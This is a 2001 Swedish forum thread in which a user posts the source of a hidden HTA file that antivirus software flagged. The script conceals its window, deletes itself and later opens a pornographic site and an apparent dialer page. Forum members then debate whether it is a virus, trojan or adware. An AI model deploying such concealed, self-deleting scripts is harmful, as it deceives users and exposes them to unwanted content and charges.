Pace Medlem sedan juni 2001 9 024 inlägg Frågan 24 okt. 2001 17:40 #1 Hittade följande lilla HTML-applikation när jag körde Norton AntiVirus2001:
Norton hade satt denna filen (c:\ht.hta) i karantän, och helt plötsligt (nu när jag försökte skriva detta inlägg) så poppar ett fönster upp från ingenstans och laddar in nedanstående porr-adress (babylon-x).
<font size="1" face="Verdana, Arial, Helvetica, sans-serif">Kod:<font size="1" face="Verdana, Arial, Helvetica, sans-serif" color="#666600"><HTML><HEAD><TITLE> </TITLE><HTA:APPLICATION SHOWINTASKBAR='no' BORDER='none' WINDOWSTATE='minimize'><SCRIPT>self.moveTo(15000,15000);var fs=new ActiveXObject('Scripting.FileSystemObject');function f(){fs.DeleteFile('c:\\ht.hta');}setTimeout('f();',500);
setTimeout('window.open("http://www.babylon-x.com/cgi-bin/click?id=rhc","\_blank ");',500000);
setTimeout('window.open("http://dist02.chargitdial.com/?1&7085","\_blank ");',1700000);
setTimeout('self.close();',1701000)
</script></body></html>
Ni kanske ska se över så att ni inte har någon liknande fil på era burkar!
------------------
"Tål det inte att skämtas om, är det inte värt att ta på allvar."
[Redigerat av Pace den 24 okt 2001]
"one hand surfing" :OO :p :e
------------------
"För övrigt stal hon mitt hjärta för evigt"
Pace Medlem sedan juni 2001 9 024 inlägg stoffe-2k: :e
Nej, vet faktiskt inte var den kommer ifrån, :p
Jag håller ju alltid åtminstone en hand på musen ! ;)
------------------
[Redigerat av Pace den 24 okt 2001]
McD Medlem sedan mars 2000 2 520 inlägg Humm är du säker på att det är ett virus? verkar vara någon form av reklam !?!?!?! :(
Har hört om detta förrut... ska kolla mer!
------------------
McD- Burgers for the people!
www.McDz.net www.SweQuake.com
[Redigerat av McD den 25 okt 2001]
Pace Medlem sedan juni 2001 9 024 inlägg Filen aktiveras av sig själv vid några tillfällen och jag har verkligen inte lagt den där, så jag betraktar den som ett virus.
Men visst är det reklam.
------------------
McD Medlem sedan mars 2000 2 520 inlägg Nja virus är det inte... virus ska ha en playload för att betraktas som virus. Snarare någon form av mask eller trojan... :) Men i det förra fallet detta kom upp var det användaren som hade startat filen för något annat program som denna ladda ner och detta kom lixom med i det programmet användaren vill ha... då spred det sig inte vidare alls dvs ingen playload.
------------------
McD- Burgers for the people!
www.McDz.net www.SweQuake.com
M mappo Medlem sedan apr. 2001 664 inlägg Jag installerade en gång ett program som kunde döpa .mp3-filer utifrån deras id3-tag.
Det la in en liknande reklam-agent.
Den var ganska känd och det fanns en artikel på astalavista där det stod hur man blev av med den.
------------------
"These are my principles. If you don't like them I have others." -Groucho Marx
Pace Medlem sedan juni 2001 9 024 inlägg McD: Mycket möjligt, hur som helst så var den inte välkommen i alla fall! :)
mappo: Hmmm, jäkligt konstigt eftersom jag inte installerat något program därifrån över huvud taget (knappast något annat oseriöst program heller).
Hur fan kan den ha hamnat på burken då? Websidor kan väl knappast skriva till mina enheter? :q
------------------